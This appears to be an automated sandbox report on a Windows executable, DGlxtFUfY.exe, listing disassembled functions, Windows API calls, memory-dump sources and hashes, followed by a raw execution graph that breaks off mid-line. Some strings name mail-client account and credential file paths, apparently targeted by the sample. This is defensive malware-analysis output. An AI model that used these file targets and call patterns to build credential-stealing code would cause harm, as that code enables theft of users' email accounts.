                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                                                • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                                                Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                • _free.LIBCMT ref: 10005B2D
                                                                                                                                                • _free.LIBCMT ref: 10005B55
                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                • _abort.LIBCMT ref: 10005B74
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3160817290-0
                                                                                                                                                • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                                                • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                                                Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                • API String ID: 4036392271-1520055953
                                                                                                                                                • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                                • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                                Function 10004B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                                                • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                                                Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                                • _free.LIBCMT ref: 100071B8
                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 336800556-0
                                                                                                                                                • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                                                • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                                                Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                                • _free.LIBCMT ref: 10005BB4
                                                                                                                                                • _free.LIBCMT ref: 10005BDB
                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                                                • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                                                Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrlen$lstrcat
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 493641738-0
                                                                                                                                                • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                                • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                                                Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _free.LIBCMT ref: 100091D0
                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                • _free.LIBCMT ref: 100091E2
                                                                                                                                                • _free.LIBCMT ref: 100091F4
                                                                                                                                                • _free.LIBCMT ref: 10009206
                                                                                                                                                • _free.LIBCMT ref: 10009218
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                                                • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                                                Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _free.LIBCMT ref: 1000536F
                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                • _free.LIBCMT ref: 10005381
                                                                                                                                                • _free.LIBCMT ref: 10005394
                                                                                                                                                • _free.LIBCMT ref: 100053A5
                                                                                                                                                • _free.LIBCMT ref: 100053B6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                                                • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                                                Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\DGlxtFUfY.exe,00000104), ref: 10004C1D
                                                                                                                                                • _free.LIBCMT ref: 10004CE8
                                                                                                                                                • _free.LIBCMT ref: 10004CF2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$FileModuleName
                                                                                                                                                • String ID: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
                                                                                                                                                • API String ID: 2506810119-1118272229
                                                                                                                                                • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                                                • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                                                Function 100086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                                • __freea.LIBCMT ref: 100087D5
                                                                                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2652629310-0
                                                                                                                                                • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                                • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                                Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                                                • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                                                • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                                                Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strlen
                                                                                                                                                • String ID: : $Se.
                                                                                                                                                • API String ID: 4218353326-4089948878
                                                                                                                                                • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                                • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                                Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                                                  • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                • String ID: Unknown exception
                                                                                                                                                • API String ID: 3476068407-410509341
                                                                                                                                                • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                                                • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:6.3%
                                                                                                                                                Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                Signature Coverage:0.8%
                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                Total number of Limit Nodes:68
                                                                                                                                                execution_graph 40564 441819 40567 430737 40564->40567 40566 441825 40568 430756 40567->40568 40569 43076d 40567->40569 40570 430774 40568->40570 40571 43075f 40568->40571 40569->40566 40573 43034a memcpy 40570->40573 40588 4169a7 11 API calls 40571->40588 40576 43077e 40573->40576 40574 4307ce 40575 430819 memset 40574->40575 40581 415b2c 40574->40581 40575->40569 40576->40569 40576->40574 40579 4307fa 40576->40579 40578 4307e9 40578->40569 40578->40575 40589 4169a7 11 API calls 40579->40589 40582 415b42 40581->40582 40584 415b46 40581->40584 40583 415b94 40582->40583 40582->40584 40586 415b5a 40582->40586 40585 4438b5 10 API calls 40583->40585 40584->40578 40585->40584 40586->40584 40587 415b79 memcpy 40586->40587 40587->40584 40588->40569 40589->40569 37545 442ec6 19 API calls 37722 4152c6 malloc 37723 4152e2 37722->37723 37724 4152ef 37722->37724 37726 416760 11 API calls 37724->37726 37726->37723 38338 4466f4 38357 446904 38338->38357 38340 446700 GetModuleHandleA 38343 446710 __set_app_type __p__fmode __p__commode 38340->38343 38342 4467a4 38344 4467ac __setusermatherr 38342->38344 38345 4467b8 38342->38345 38343->38342 38344->38345 38358 4468f0 _controlfp 38345->38358 38347 4467bd _initterm __wgetmainargs _initterm 38348 446810 38347->38348 38349 44681e GetStartupInfoW 38347->38349 38351 446866 GetModuleHandleA 38349->38351 38359 41276d 38351->38359 38355 446896 exit 38356 44689d _cexit 38355->38356 38356->38348 38357->38340 38358->38347 38360 41277d 38359->38360 38402 4044a4 LoadLibraryW 38360->38402 38362 412785 38363 412789 38362->38363 38410 414b81 38362->38410 38363->38355 38363->38356 38366 4127c8 38416 412465 memset ??2@YAPAXI 38366->38416 38368 4127ea 38428 40ac21 38368->38428 38373 412813 38446 40dd07 memset 38373->38446 38374 412827 38451 40db69 memset 38374->38451 38377 412822 38472 4125b6 ??3@YAXPAX 38377->38472 38379 40ada2 _wcsicmp 38380 41283d 38379->38380 38380->38377 38383 412863 CoInitialize 38380->38383 38456 41268e 38380->38456 38476 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38383->38476 38385 41296f 38478 40b633 38385->38478 38390 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38394 412957 CoUninitialize 38390->38394 38399 4128ca 38390->38399 38394->38377 38395 4128d0 TranslateAcceleratorW 38396 412941 GetMessageW 38395->38396 38395->38399 38396->38394 38396->38395 38397 412909 IsDialogMessageW 38397->38396 38397->38399 38398 4128fd IsDialogMessageW 38398->38396 38398->38397 38399->38395 38399->38397 38399->38398 38400 41292b TranslateMessage DispatchMessageW 38399->38400 38401 41291f IsDialogMessageW 38399->38401 38400->38396 38401->38396 38401->38400 38403 4044f7 38402->38403 38404 4044cf GetProcAddress 38402->38404 38408 404507 MessageBoxW 38403->38408 38409 40451e 38403->38409 38405 4044e8 FreeLibrary 38404->38405 38406 4044df 38404->38406 38405->38403 38407 4044f3 38405->38407 38406->38405 38407->38403 38408->38362 38409->38362 38411 414b8a 38410->38411 38412 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38410->38412 38482 40a804 memset 38411->38482 38412->38366 38415 414b9e GetProcAddress 38415->38412 38417 4124e0 38416->38417 38418 412505 ??2@YAPAXI 38417->38418 38419 41251c 38418->38419 38421 412521 38418->38421 38504 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38419->38504 38493 444722 38421->38493 38427 